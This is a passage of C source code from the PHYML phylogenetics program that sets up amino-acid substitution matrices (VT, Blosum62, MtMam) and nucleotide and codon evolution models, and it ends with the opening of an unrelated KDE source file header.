pi[12]= 0.022; pi[13]= 0.051; pi[14]= 0.043; pi[15]= 0.062;
pi[16]= 0.054; pi[17]= 0.018; pi[18]= 0.031; pi[19]= 0.066;
return 1;
}
/*********************************************************/
int Init_Qmat_VT(double *daa, double *pi)
{
/*
This model has been 'translated' from John Huelsenbeck and Fredrik Ronquist
MrBayes program into PHYML format by Federico Abascal. Many thanks to them.
*/
/*
Muller, T., and M. Vingron. 2000. Modeling amino acid replacement.
Journal of Computational Biology 7:761-776.
*/
int i,j,naa;
naa = 20;
daa[1*20+0]= 0.233108; daa[2*20+0]= 0.199097; daa[2*20+1]= 0.210797; daa[3*20+0]= 0.265145;
daa[3*20+1]= 0.105191; daa[3*20+2]= 0.883422; daa[4*20+0]= 0.227333; daa[4*20+1]= 0.031726;
daa[4*20+2]= 0.027495; daa[4*20+3]= 0.010313; daa[5*20+0]= 0.310084; daa[5*20+1]= 0.493763;
daa[5*20+2]= 0.2757; daa[5*20+3]= 0.205842; daa[5*20+4]= 0.004315; daa[6*20+0]= 0.567957;
daa[6*20+1]= 0.25524; daa[6*20+2]= 0.270417; daa[6*20+3]= 1.599461; daa[6*20+4]= 0.005321;
daa[6*20+5]= 0.960976; daa[7*20+0]= 0.876213; daa[7*20+1]= 0.156945; daa[7*20+2]= 0.362028;
daa[7*20+3]= 0.311718; daa[7*20+4]= 0.050876; daa[7*20+5]= 0.12866; daa[7*20+6]= 0.250447;
daa[8*20+0]= 0.078692; daa[8*20+1]= 0.213164; daa[8*20+2]= 0.290006; daa[8*20+3]= 0.134252;
daa[8*20+4]= 0.016695; daa[8*20+5]= 0.315521; daa[8*20+6]= 0.104458; daa[8*20+7]= 0.058131;
daa[9*20+0]= 0.222972; daa[9*20+1]= 0.08151; daa[9*20+2]= 0.087225; daa[9*20+3]= 0.01172;
daa[9*20+4]= 0.046398; daa[9*20+5]= 0.054602; daa[9*20+6]= 0.046589; daa[9*20+7]= 0.051089;
daa[9*20+8]= 0.020039; daa[10*20+0]= 0.42463; daa[10*20+1]= 0.192364; daa[10*20+2]= 0.069245;
daa[10*20+3]= 0.060863; daa[10*20+4]= 0.091709; daa[10*20+5]= 0.24353; daa[10*20+6]= 0.151924;
daa[10*20+7]= 0.087056; daa[10*20+8]= 0.103552; daa[10*20+9]= 2.08989; daa[11*20+0]= 0.393245;
daa[11*20+1]= 1.755838; daa[11*20+2]= 0.50306; daa[11*20+3]= 0.261101; daa[11*20+4]= 0.004067;
daa[11*20+5]= 0.738208; daa[11*20+6]= 0.88863; daa[11*20+7]= 0.193243; daa[11*20+8]= 0.153323;
daa[11*20+9]= 0.093181; daa[11*20+10]= 0.201204; daa[12*20+0]= 0.21155; daa[12*20+1]= 0.08793;
daa[12*20+2]= 0.05742; daa[12*20+3]= 0.012182; daa[12*20+4]= 0.02369; daa[12*20+5]= 0.120801;
daa[12*20+6]= 0.058643; daa[12*20+7]= 0.04656; daa[12*20+8]= 0.021157; daa[12*20+9]= 0.493845;
daa[12*20+10]= 1.105667; daa[12*20+11]= 0.096474; daa[13*20+0]= 0.116646; daa[13*20+1]= 0.042569;
daa[13*20+2]= 0.039769; daa[13*20+3]= 0.016577; daa[13*20+4]= 0.051127; daa[13*20+5]= 0.026235;
daa[13*20+6]= 0.028168; daa[13*20+7]= 0.050143; daa[13*20+8]= 0.079807; daa[13*20+9]= 0.32102;
daa[13*20+10]= 0.946499; daa[13*20+11]= 0.038261; daa[13*20+12]= 0.173052; daa[14*20+0]= 0.399143;
daa[14*20+1]= 0.12848; daa[14*20+2]= 0.083956; daa[14*20+3]= 0.160063; daa[14*20+4]= 0.011137;
daa[14*20+5]= 0.15657; daa[14*20+6]= 0.205134; daa[14*20+7]= 0.124492; daa[14*20+8]= 0.078892;
daa[14*20+9]= 0.054797; daa[14*20+10]= 0.169784; daa[14*20+11]= 0.212302; daa[14*20+12]= 0.010363;
daa[14*20+13]= 0.042564; daa[15*20+0]= 1.817198; daa[15*20+1]= 0.292327; daa[15*20+2]= 0.847049;
daa[15*20+3]= 0.461519; daa[15*20+4]= 0.17527; daa[15*20+5]= 0.358017; daa[15*20+6]= 0.406035;
daa[15*20+7]= 0.612843; daa[15*20+8]= 0.167406; daa[15*20+9]= 0.081567; daa[15*20+10]= 0.214977;
daa[15*20+11]= 0.400072; daa[15*20+12]= 0.090515; daa[15*20+13]= 0.138119; daa[15*20+14]= 0.430431;
daa[16*20+0]= 0.877877; daa[16*20+1]= 0.204109; daa[16*20+2]= 0.471268; daa[16*20+3]= 0.178197;
daa[16*20+4]= 0.079511; daa[16*20+5]= 0.248992; daa[16*20+6]= 0.321028; daa[16*20+7]= 0.136266;
daa[16*20+8]= 0.101117; daa[16*20+9]= 0.376588; daa[16*20+10]= 0.243227; daa[16*20+11]= 0.446646;
daa[16*20+12]= 0.184609; daa[16*20+13]= 0.08587; daa[16*20+14]= 0.207143; daa[16*20+15]= 1.767766;
daa[17*20+0]= 0.030309; daa[17*20+1]= 0.046417; daa[17*20+2]= 0.010459; daa[17*20+3]= 0.011393;
daa[17*20+4]= 0.007732; daa[17*20+5]= 0.021248; daa[17*20+6]= 0.018844; daa[17*20+7]= 0.02399;
daa[17*20+8]= 0.020009; daa[17*20+9]= 0.034954; daa[17*20+10]= 0.083439; daa[17*20+11]= 0.023321;
daa[17*20+12]= 0.022019; daa[17*20+13]= 0.12805; daa[17*20+14]= 0.014584; daa[17*20+15]= 0.035933;
daa[17*20+16]= 0.020437; daa[18*20+0]= 0.087061; daa[18*20+1]= 0.09701; daa[18*20+2]= 0.093268;
daa[18*20+3]= 0.051664; daa[18*20+4]= 0.042823; daa[18*20+5]= 0.062544; daa[18*20+6]= 0.0552;
daa[18*20+7]= 0.037568; daa[18*20+8]= 0.286027; daa[18*20+9]= 0.086237; daa[18*20+10]= 0.189842;
daa[18*20+11]= 0.068689; daa[18*20+12]= 0.073223; daa[18*20+13]= 0.898663; daa[18*20+14]= 0.032043;
daa[18*20+15]= 0.121979; daa[18*20+16]= 0.094617; daa[18*20+17]= 0.124746; daa[19*20+0]= 1.230985;
daa[19*20+1]= 0.113146; daa[19*20+2]= 0.049824; daa[19*20+3]= 0.048769; daa[19*20+4]= 0.163831;
daa[19*20+5]= 0.112027; daa[19*20+6]= 0.205868; daa[19*20+7]= 0.082579; daa[19*20+8]= 0.068575;
daa[19*20+9]= 3.65443; daa[19*20+10]= 1.337571; daa[19*20+11]= 0.144587; daa[19*20+12]= 0.307309;
daa[19*20+13]= 0.247329; daa[19*20+14]= 0.129315; daa[19*20+15]= 0.1277; daa[19*20+16]= 0.740372;
daa[19*20+17]= 0.022134; daa[19*20+18]= 0.125733;
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
pi[0]= 0.078837; pi[1]= 0.051238; pi[2]= 0.042313; pi[3]= 0.053066;
pi[4]= 0.015175; pi[5]= 0.036713; pi[6]= 0.061924; pi[7]= 0.070852;
pi[8]= 0.023082; pi[9]= 0.062056; pi[10]= 0.096371; pi[11]= 0.057324;
pi[12]= 0.023771; pi[13]= 0.043296; pi[14]= 0.043911; pi[15]= 0.063403;
pi[16]= 0.055897; pi[17]= 0.013272; pi[18]= 0.034399; pi[19]= 0.073101;
return 1;
}
/*********************************************************/
int Init_Qmat_Blosum62 (double *daa, double *pi)
{
/*
This model has been 'translated' from John Huelsenbeck and Fredrik Ronquist
MrBayes program into PHYML format by Federico Abascal. Many thanks to them.
*/
/*
Henikoff, S., and J. G. Henikoff. 1992. Amino acid substitution
matrices from protein blocks. Proc. Natl. Acad. Sci., U.S.A.
89:10915-10919.
*/
int i,j,naa;
naa = 20;
daa[1*20+0]= 0.735790389698; daa[2*20+0]= 0.485391055466; daa[2*20+1]= 1.297446705134; daa[3*20+0]= 0.543161820899;
daa[3*20+1]= 0.500964408555; daa[3*20+2]= 3.180100048216; daa[4*20+0]= 1.45999531047; daa[4*20+1]= 0.227826574209;
daa[4*20+2]= 0.397358949897; daa[4*20+3]= 0.240836614802; daa[5*20+0]= 1.199705704602; daa[5*20+1]= 3.020833610064;
daa[5*20+2]= 1.839216146992; daa[5*20+3]= 1.190945703396; daa[5*20+4]= 0.32980150463; daa[6*20+0]= 1.1709490428;
daa[6*20+1]= 1.36057419042; daa[6*20+2]= 1.24048850864; daa[6*20+3]= 3.761625208368; daa[6*20+4]= 0.140748891814;
daa[6*20+5]= 5.528919177928; daa[7*20+0]= 1.95588357496; daa[7*20+1]= 0.418763308518; daa[7*20+2]= 1.355872344485;
daa[7*20+3]= 0.798473248968; daa[7*20+4]= 0.418203192284; daa[7*20+5]= 0.609846305383; daa[7*20+6]= 0.423579992176;
daa[8*20+0]= 0.716241444998; daa[8*20+1]= 1.456141166336; daa[8*20+2]= 2.414501434208; daa[8*20+3]= 0.778142664022;
daa[8*20+4]= 0.354058109831; daa[8*20+5]= 2.43534113114; daa[8*20+6]= 1.626891056982; daa[8*20+7]= 0.539859124954;
daa[9*20+0]= 0.605899003687; daa[9*20+1]= 0.232036445142; daa[9*20+2]= 0.283017326278; daa[9*20+3]= 0.418555732462;
daa[9*20+4]= 0.774894022794; daa[9*20+5]= 0.236202451204; daa[9*20+6]= 0.186848046932; daa[9*20+7]= 0.189296292376;
daa[9*20+8]= 0.252718447885; daa[10*20+0]= 0.800016530518; daa[10*20+1]= 0.622711669692; daa[10*20+2]= 0.211888159615;
daa[10*20+3]= 0.218131577594; daa[10*20+4]= 0.831842640142; daa[10*20+5]= 0.580737093181; daa[10*20+6]= 0.372625175087;
daa[10*20+7]= 0.217721159236; daa[10*20+8]= 0.348072209797; daa[10*20+9]= 3.890963773304; daa[11*20+0]= 1.295201266783;
daa[11*20+1]= 5.411115141489; daa[11*20+2]= 1.593137043457; daa[11*20+3]= 1.032447924952; daa[11*20+4]= 0.285078800906;
daa[11*20+5]= 3.945277674515; daa[11*20+6]= 2.802427151679; daa[11*20+7]= 0.752042440303; daa[11*20+8]= 1.022507035889;
daa[11*20+9]= 0.406193586642; daa[11*20+10]= 0.445570274261;daa[12*20+0]= 1.253758266664; daa[12*20+1]= 0.983692987457;
daa[12*20+2]= 0.648441278787; daa[12*20+3]= 0.222621897958; daa[12*20+4]= 0.76768882348; daa[12*20+5]= 2.494896077113;
daa[12*20+6]= 0.55541539747; daa[12*20+7]= 0.459436173579; daa[12*20+8]= 0.984311525359; daa[12*20+9]= 3.364797763104;
daa[12*20+10]= 6.030559379572;daa[12*20+11]= 1.073061184332;daa[13*20+0]= 0.492964679748; daa[13*20+1]= 0.371644693209;
daa[13*20+2]= 0.354861249223; daa[13*20+3]= 0.281730694207; daa[13*20+4]= 0.441337471187; daa[13*20+5]= 0.14435695975;
daa[13*20+6]= 0.291409084165; daa[13*20+7]= 0.368166464453; daa[13*20+8]= 0.714533703928; daa[13*20+9]= 1.517359325954;
daa[13*20+10]= 2.064839703237;daa[13*20+11]= 0.266924750511;daa[13*20+12]= 1.77385516883; daa[14*20+0]= 1.173275900924;
daa[14*20+1]= 0.448133661718; daa[14*20+2]= 0.494887043702; daa[14*20+3]= 0.730628272998; daa[14*20+4]= 0.356008498769;
daa[14*20+5]= 0.858570575674; daa[14*20+6]= 0.926563934846; daa[14*20+7]= 0.504086599527; daa[14*20+8]= 0.527007339151;
daa[14*20+9]= 0.388355409206; daa[14*20+10]= 0.374555687471;daa[14*20+11]= 1.047383450722;daa[14*20+12]= 0.454123625103;
daa[14*20+13]= 0.233597909629;daa[15*20+0]= 4.325092687057; daa[15*20+1]= 1.12278310421; daa[15*20+2]= 2.904101656456;
daa[15*20+3]= 1.582754142065; daa[15*20+4]= 1.197188415094; daa[15*20+5]= 1.934870924596; daa[15*20+6]= 1.769893238937;
daa[15*20+7]= 1.509326253224; daa[15*20+8]= 1.11702976291; daa[15*20+9]= 0.35754441246; daa[15*20+10]= 0.352969184527;
daa[15*20+11]= 1.752165917819;daa[15*20+12]= 0.918723415746;daa[15*20+13]= 0.540027644824;daa[15*20+14]= 1.169129577716;
daa[16*20+0]= 1.729178019485; daa[16*20+1]= 0.914665954563; daa[16*20+2]= 1.898173634533; daa[16*20+3]= 0.934187509431;
daa[16*20+4]= 1.119831358516; daa[16*20+5]= 1.277480294596; daa[16*20+6]= 1.071097236007; daa[16*20+7]= 0.641436011405;
daa[16*20+8]= 0.585407090225; daa[16*20+9]= 1.17909119726; daa[16*20+10]= 0.915259857694;daa[16*20+11]= 1.303875200799;
daa[16*20+12]= 1.488548053722;daa[16*20+13]= 0.488206118793;daa[16*20+14]= 1.005451683149;daa[16*20+15]= 5.15155629227;
daa[17*20+0]= 0.465839367725; daa[17*20+1]= 0.426382310122; daa[17*20+2]= 0.191482046247; daa[17*20+3]= 0.145345046279;
daa[17*20+4]= 0.527664418872; daa[17*20+5]= 0.758653808642; daa[17*20+6]= 0.407635648938; daa[17*20+7]= 0.508358924638;
daa[17*20+8]= 0.30124860078; daa[17*20+9]= 0.34198578754; daa[17*20+10]= 0.6914746346; daa[17*20+11]= 0.332243040634;
daa[17*20+12]= 0.888101098152;daa[17*20+13]= 2.074324893497;daa[17*20+14]= 0.252214830027;daa[17*20+15]= 0.387925622098;
daa[17*20+16]= 0.513128126891;daa[18*20+0]= 0.718206697586; daa[18*20+1]= 0.720517441216; daa[18*20+2]= 0.538222519037;
daa[18*20+3]= 0.261422208965; daa[18*20+4]= 0.470237733696; daa[18*20+5]= 0.95898974285; daa[18*20+6]= 0.596719300346;
daa[18*20+7]= 0.308055737035; daa[18*20+8]= 4.218953969389; daa[18*20+9]= 0.674617093228; daa[18*20+10]= 0.811245856323;
daa[18*20+11]= 0.7179934869; daa[18*20+12]= 0.951682162246;daa[18*20+13]= 6.747260430801;daa[18*20+14]= 0.369405319355;
daa[18*20+15]= 0.796751520761;daa[18*20+16]= 0.801010243199;daa[18*20+17]= 4.054419006558;daa[19*20+0]= 2.187774522005;
daa[19*20+1]= 0.438388343772; daa[19*20+2]= 0.312858797993; daa[19*20+3]= 0.258129289418; daa[19*20+4]= 1.116352478606;
daa[19*20+5]= 0.530785790125; daa[19*20+6]= 0.524253846338; daa[19*20+7]= 0.25334079019; daa[19*20+8]= 0.20155597175;
daa[19*20+9]= 8.311839405458; daa[19*20+10]= 2.231405688913;daa[19*20+11]= 0.498138475304;daa[19*20+12]= 2.575850755315;
daa[19*20+13]= 0.838119610178;daa[19*20+14]= 0.496908410676;daa[19*20+15]= 0.561925457442;daa[19*20+16]= 2.253074051176;
daa[19*20+17]= 0.266508731426;daa[19*20+18]= 1;
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
pi[0]= 0.074; pi[1]= 0.052; pi[2]= 0.045; pi[3]= 0.054;
pi[4]= 0.025; pi[5]= 0.034; pi[6]= 0.054; pi[7]= 0.074;
pi[8]= 0.026; pi[9]= 0.068; pi[10]= 0.099; pi[11]= 0.058;
pi[12]= 0.025; pi[13]= 0.047; pi[14]= 0.039; pi[15]= 0.057;
pi[16]= 0.051; pi[17]= 0.013; pi[18]= 0.032; pi[19]= 0.073;
return 1;
}
/*********************************************************/
int Init_Qmat_MtMam(double *daa, double *pi)
{
/*
This model has been 'translated' from Ziheng Yang's PAML program
into PHYML format by Federico Abascal. Many thanks to them.
*/
/*
Cao, Y. et al. 1998 Conflict amongst individual mitochondrial
proteins in resolving the phylogeny of eutherian orders. Journal
of Molecular Evolution 15:1600-1611.
*/
int i,j,naa;
naa = 20;
daa[1*20+0]= 32; daa[2*20+0]= 2; daa[2*20+1]= 4; daa[3*20+0]= 11;
daa[3*20+1]= 0; daa[3*20+2]= 864; daa[4*20+0]= 0; daa[4*20+1]= 186;
daa[4*20+2]= 0; daa[4*20+3]= 0; daa[5*20+0]= 0; daa[5*20+1]= 246;
daa[5*20+2]= 8; daa[5*20+3]= 49; daa[5*20+4]= 0; daa[6*20+0]= 0;
daa[6*20+1]= 0; daa[6*20+2]= 0; daa[6*20+3]= 569; daa[6*20+4]= 0;
daa[6*20+5]= 274; daa[7*20+0]= 78; daa[7*20+1]= 18; daa[7*20+2]= 47;
daa[7*20+3]= 79; daa[7*20+4]= 0; daa[7*20+5]= 0; daa[7*20+6]= 22;
daa[8*20+0]= 8; daa[8*20+1]= 232; daa[8*20+2]= 458; daa[8*20+3]= 11;
daa[8*20+4]= 305; daa[8*20+5]= 550; daa[8*20+6]= 22; daa[8*20+7]= 0;
daa[9*20+0]= 75; daa[9*20+1]= 0; daa[9*20+2]= 19; daa[9*20+3]= 0;
daa[9*20+4]= 41; daa[9*20+5]= 0; daa[9*20+6]= 0; daa[9*20+7]= 0;
daa[9*20+8]= 0; daa[10*20+0]= 21; daa[10*20+1]= 6; daa[10*20+2]= 0;
daa[10*20+3]= 0; daa[10*20+4]= 27; daa[10*20+5]= 20; daa[10*20+6]= 0;
daa[10*20+7]= 0; daa[10*20+8]= 26; daa[10*20+9]= 232; daa[11*20+0]= 0;
daa[11*20+1]= 50; daa[11*20+2]= 408; daa[11*20+3]= 0; daa[11*20+4]= 0;
daa[11*20+5]= 242; daa[11*20+6]= 215; daa[11*20+7]= 0; daa[11*20+8]= 0;
daa[11*20+9]= 6; daa[11*20+10]= 4; daa[12*20+0]= 76; daa[12*20+1]= 0;
daa[12*20+2]= 21; daa[12*20+3]= 0; daa[12*20+4]= 0; daa[12*20+5]= 22;
daa[12*20+6]= 0; daa[12*20+7]= 0; daa[12*20+8]= 0; daa[12*20+9]= 378;
daa[12*20+10]= 609; daa[12*20+11]= 59; daa[13*20+0]= 0; daa[13*20+1]= 0;
daa[13*20+2]= 6; daa[13*20+3]= 5; daa[13*20+4]= 7; daa[13*20+5]= 0;
daa[13*20+6]= 0; daa[13*20+7]= 0; daa[13*20+8]= 0; daa[13*20+9]= 57;
daa[13*20+10]= 246; daa[13*20+11]= 0; daa[13*20+12]= 11; daa[14*20+0]= 53;
daa[14*20+1]= 9; daa[14*20+2]= 33; daa[14*20+3]= 2; daa[14*20+4]= 0;
daa[14*20+5]= 51; daa[14*20+6]= 0; daa[14*20+7]= 0; daa[14*20+8]= 53;
daa[14*20+9]= 5; daa[14*20+10]= 43; daa[14*20+11]= 18; daa[14*20+12]= 0;
daa[14*20+13]= 17; daa[15*20+0]= 342; daa[15*20+1]= 3; daa[15*20+2]= 446;
daa[15*20+3]= 16; daa[15*20+4]= 347; daa[15*20+5]= 30; daa[15*20+6]= 21;
daa[15*20+7]= 112; daa[15*20+8]= 20; daa[15*20+9]= 0; daa[15*20+10]= 74;
daa[15*20+11]= 65; daa[15*20+12]= 47; daa[15*20+13]= 90; daa[15*20+14]= 202;
daa[16*20+0]= 681; daa[16*20+1]= 0; daa[16*20+2]= 110; daa[16*20+3]= 0;
daa[16*20+4]= 114; daa[16*20+5]= 0; daa[16*20+6]= 4; daa[16*20+7]= 0;
daa[16*20+8]= 1; daa[16*20+9]= 360; daa[16*20+10]= 34; daa[16*20+11]= 50;
daa[16*20+12]= 691; daa[16*20+13]= 8; daa[16*20+14]= 78; daa[16*20+15]= 614;
daa[17*20+0]= 5; daa[17*20+1]= 16; daa[17*20+2]= 6; daa[17*20+3]= 0;
daa[17*20+4]= 65; daa[17*20+5]= 0; daa[17*20+6]= 0; daa[17*20+7]= 0;
daa[17*20+8]= 0; daa[17*20+9]= 0; daa[17*20+10]= 12; daa[17*20+11]= 0;
daa[17*20+12]= 13; daa[17*20+13]= 0; daa[17*20+14]= 7; daa[17*20+15]= 17;
daa[17*20+16]= 0; daa[18*20+0]= 0; daa[18*20+1]= 0; daa[18*20+2]= 156;
daa[18*20+3]= 0; daa[18*20+4]= 530; daa[18*20+5]= 54; daa[18*20+6]= 0;
daa[18*20+7]= 1; daa[18*20+8]= 1525;daa[18*20+9]= 16; daa[18*20+10]= 25;
daa[18*20+11]= 67; daa[18*20+12]= 0; daa[18*20+13]= 682; daa[18*20+14]= 8;
daa[18*20+15]= 107; daa[18*20+16]= 0; daa[18*20+17]= 14; daa[19*20+0]= 398;
daa[19*20+1]= 0; daa[19*20+2]= 0; daa[19*20+3]= 10; daa[19*20+4]= 0;
daa[19*20+5]= 33; daa[19*20+6]= 20; daa[19*20+7]= 5; daa[19*20+8]= 0;
daa[19*20+9]= 2220; daa[19*20+10]= 100;daa[19*20+11]= 0; daa[19*20+12]= 832;
daa[19*20+13]= 6; daa[19*20+14]= 0; daa[19*20+15]= 0; daa[19*20+16]= 237;
daa[19*20+17]= 0; daa[19*20+18]= 0;
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
pi[0]= 0.0692; pi[1]= 0.0184; pi[2]= 0.04; pi[3]= 0.0186;
pi[4]= 0.0065; pi[5]= 0.0238; pi[6]= 0.0236; pi[7]= 0.0557;
pi[8]= 0.0277; pi[9]= 0.0905; pi[10]=0.1675; pi[11]= 0.0221;
pi[12]=0.0561; pi[13]= 0.0611; pi[14]=0.0536; pi[15]= 0.0725;
pi[16]=0.087; pi[17]= 0.0293; pi[18]=0.034; pi[19]= 0.0428;
return 1;
}
/*********************************************************/
void Init_Model(allseq *data, model *mod)
{
int i,j;
int ns;
double sum,aux;
int result;
double *dr, *di, *space;
if(data) mod->seq_len = data->init_len;
For(i,mod->n_catg)
{
mod->rr[i] = 1.0;
mod->r_proba[i] = 1.0;
}
if(!mod->invar) For(i,data->crunch_len) data->invar[i] = 0;
ns = mod->ns;
mod->datatype = (mod->whichmodel>=10)?((mod->whichmodel>20)?(0):(1)):(0);
dr = (double *)mCalloc( ns,sizeof(double));
di = (double *)mCalloc( ns,sizeof(double));
space = (double *)mCalloc(2*ns,sizeof(double));
For(i,ns)
mod->pi[i] = data->b_frq[i];
if(!mod->datatype) /* Nucleotides */
{
if(mod->whichmodel < 40)
{
/* init for nucleotides */
mod->lambda = 1.;
if((mod->whichmodel==1) || (mod->whichmodel==2))
{
mod->pi[0] = mod->pi[1] = mod->pi[2] = mod->pi[3] = .25;
}
if((mod->whichmodel==1) || (mod->whichmodel==3) || (mod->whichmodel==7) || (mod->whichmodel==8))
{
mod->kappa = 1.;
}
if(mod->whichmodel == 5)
{
aux = ((mod->pi[0]+mod->pi[2])-(mod->pi[1]+mod->pi[3]))/(2.*mod->kappa);
mod->lambda = ((mod->pi[1]+mod->pi[3]) + aux)/((mod->pi[0]+mod->pi[2]) - aux);
}
if(mod->whichmodel == 7)
{
mod->custom_mod_string[0] = '0';
mod->custom_mod_string[1] = '1';
mod->custom_mod_string[2] = '2';
mod->custom_mod_string[3] = '3';
mod->custom_mod_string[4] = '4';
mod->custom_mod_string[5] = '5';
Translate_Custom_Mod_String(mod);
Update_Qmat_GTR(mod);
}
if(mod->whichmodel == 8)
{
if(mod->user_b_freq[0] > -1.)
{
For(i,4)
{
mod->pi[i] = mod->user_b_freq[i];
}
}
Update_Qmat_GTR(mod);
}
}
else
{
/* init for codon model */
For(i,64) mod->pi[i] = 1./61;
}
}
else
{ /* init for amino-acids */
/* see comments of PMat_Empirical for details */
/* read pi and Q from file */
switch(mod->whichmodel)
{
case 11 :
{
Init_Qmat_Dayhoff(mod->mat_Q,mod->pi);
break;
}
case 12 :
{
Init_Qmat_JTT(mod->mat_Q,mod->pi);
break;
}
case 13 :
{
Init_Qmat_MtREV(mod->mat_Q,mod->pi);
break;
}
case 14 :
{
Init_Qmat_WAG(mod->mat_Q,mod->pi);
break;
}
case 15 :
{
Init_Qmat_DCMut(mod->mat_Q,mod->pi);
break;
}
case 16 :
{
Init_Qmat_RtREV(mod->mat_Q,mod->pi);
break;
}
case 17 :
{
Init_Qmat_CpREV(mod->mat_Q,mod->pi);
break;
}
case 18 :
{
Init_Qmat_VT(mod->mat_Q,mod->pi);
break;
}
case 19 :
{
Init_Qmat_Blosum62(mod->mat_Q,mod->pi);
break;
}
case 20 :
{
Init_Qmat_MtMam(mod->mat_Q,mod->pi);
break;
}
default : break;
}
/* multiply the nth col of Q by the nth term of pi/100 just as in PAML */
For(i,ns) For(j,ns) mod->mat_Q[i*ns+j] *= mod->pi[j] / 100.0;
/* compute diagonal terms of Q and mean rate mr = l/t */
mod->mr = .0;
For (i,ns)
{
sum=.0;
For(j, ns) sum += mod->mat_Q[i*ns+j];
mod->mat_Q[i*ns+i] = -sum;
mod->mr += mod->pi[i] * sum;
}
/* scale instantaneous rate matrix so that mu=1 */
For (i,ns*ns) mod->mat_Q[i] /= mod->mr;
/* compute eigenvectors/values */
result = 0;
if (result==eigen(1, mod->mat_Q,ns,dr,di,mod->mat_Vr, mod->mat_Vi, space))
{
/* compute inverse(Vr) into Vi */
For (i,ns*ns) mod->mat_Vi[i] = mod->mat_Vr[i];
Matinv(mod->mat_Vi, ns, ns, space);
/* compute the diagonal terms of exp(D) */
For (i,ns) mod->vct_eDmr[i] = exp(dr[i]);
}
else
{
if (result==-1)
printf("\n. Eigenvalues/vectors computation does not converge : computation cancelled");
else if (result==1)
printf("\n. Complex eigenvalues/vectors : computation cancelled");
}
}
mod->alpha_old = mod->alpha;
mod->kappa_old = mod->kappa;
mod->lambda_old = mod->lambda;
mod->pinvar_old = mod->pinvar;
free(dr);free(di);free(space);
}
/*********************************************************/
void Update_Qmat_GTR(model *mod)
{
int result;
int i,j,ns;
double *di,*space,*mat_buff;
ns = 4;
di = (double *)mCalloc(ns,sizeof(double));
space = (double *)mCalloc(2*ns,sizeof(double));
mat_buff = (double *)mCalloc(ns*ns,sizeof(double));
mod->mat_Q[0*4+1] = *(mod->rr_param[0])*mod->pi[1];
mod->mat_Q[0*4+2] = *(mod->rr_param[1])*mod->pi[2];
mod->mat_Q[0*4+3] = *(mod->rr_param[2])*mod->pi[3];
mod->mat_Q[1*4+0] = *(mod->rr_param[0])*mod->pi[0];
mod->mat_Q[1*4+2] = *(mod->rr_param[3])*mod->pi[2];
mod->mat_Q[1*4+3] = *(mod->rr_param[4])*mod->pi[3];
mod->mat_Q[2*4+0] = *(mod->rr_param[1])*mod->pi[0];
mod->mat_Q[2*4+1] = *(mod->rr_param[3])*mod->pi[1];
mod->mat_Q[2*4+3] = 1.0*mod->pi[3];
mod->mat_Q[3*4+0] = *(mod->rr_param[2])*mod->pi[0];
mod->mat_Q[3*4+1] = *(mod->rr_param[4])*mod->pi[1];
mod->mat_Q[3*4+2] = 1.0*mod->pi[2];
mod->mat_Q[0*4+0] = -(*(mod->rr_param[0])*mod->pi[1]+*(mod->rr_param[1])*mod->pi[2]+*(mod->rr_param[2])*mod->pi[3]);
mod->mat_Q[1*4+1] = -(*(mod->rr_param[0])*mod->pi[0]+*(mod->rr_param[3])*mod->pi[2]+*(mod->rr_param[4])*mod->pi[3]);
mod->mat_Q[2*4+2] = -(*(mod->rr_param[1])*mod->pi[0]+*(mod->rr_param[3])*mod->pi[1]+1.0*mod->pi[3]);
mod->mat_Q[3*4+3] = -(*(mod->rr_param[2])*mod->pi[0]+*(mod->rr_param[4])*mod->pi[1]+1.0*mod->pi[2]);
/* compute diagonal terms of Q and mean rate mr = l/t */
mod->mr = .0;
For (i,ns) mod->mr += mod->pi[i] * (-mod->mat_Q[i*ns+i]);
For(i,ns*ns) mod->mat_Q[i] /= mod->mr;
/* printf("mr=%f\n",mod->mr); */
/* compute eigenvectors/values */
result = 0;
For(i,ns) For(j,ns) mat_buff[i*ns+j] = mod->mat_Q[i*ns+j];
if (result==eigen(1,mat_buff,ns,mod->vct_ev,di,mod->mat_Vr, mod->mat_Vi, space))
{
/* compute inverse(Vr) into Vi */
For (i,ns*ns) mod->mat_Vi[i] = mod->mat_Vr[i];
Matinv(mod->mat_Vi, ns, ns, space);
/* compute the diagonal terms of exp(D) */
For (i,ns) mod->vct_eDmr[i] = exp(mod->vct_ev[i]);
}
else
{
if (result==-1)
printf("eigenvalues/vectors computation does not converge : computation cancelled");
else if (result==1)
printf("complex eigenvalues/vectors : computation cancelled");
}
Free(di);
Free(space);
Free(mat_buff);
}
/*********************************************************/
void Translate_Custom_Mod_String(model *mod)
{
int identity;
int i,j;
int *n_diff_param;
int *mod_code;
mod_code = (int *)mCalloc(6,sizeof(int));
n_diff_param = &(mod->n_diff_rr_param);
*n_diff_param=0;
For(i,6)
{
identity = -1;
For(j,i)
{
if((mod->custom_mod_string[i] ==
mod->custom_mod_string[j]))
{
identity = j;
break;
}
}
if(identity == -1)
{
mod->rr_param_num[*n_diff_param][0] = i;
mod->n_rr_param_per_cat[*n_diff_param] = 1;
mod_code[i] = *n_diff_param;
(*n_diff_param)++;
}
else
{
mod_code[i] = mod_code[identity];
mod->rr_param_num[mod_code[i]]
[mod->n_rr_param_per_cat[mod_code[i]]] = i;
mod->n_rr_param_per_cat[mod_code[i]] += 1;
}
}
Free(mod_code);
}
/*********************************************************/
void Set_Model_Parameters(arbre *tree)
{
double sum;
int i;
DiscreteGamma (tree->mod->r_proba, tree->mod->rr, tree->mod->alpha,
tree->mod->alpha,tree->mod->n_catg,0);
if((tree->mod->whichmodel < 10) && (tree->mod->s_opt->opt_bfreq))
{
sum = .0;
For(i,4) sum += tree->mod->pi[i];
For(i,4)
{
tree->mod->pi[i] /= sum;
/* printf("pi[%d]->%f\n",i+1,tree->mod->pi[i]); */
}
}
if(tree->mod->whichmodel >= 7)
{
For(i,6)
{
tree->mod->rr_param_values[i] /= tree->mod->rr_param_values[5];
}
}
if(tree->mod->update_eigen)
{
if(!tree->mod->datatype)
{
if(tree->mod->whichmodel < 20) Update_Qmat_GTR(tree->mod);
}
}
}
/*********************************************************/
| gpl-2.0 |
iegor/kdegraphics | kcoloredit/editablestreamhistory.cpp | 2 | 1065 | /***************************************************************************
editablestream.cpp - description
-------------------
begin : Sun Jul 9 2000
copyright : (C) 2000 by Artur Rataj
email : art@zeus.polsl.gliwice.pl
***************************************************************************/
/***************************************************************************
* *
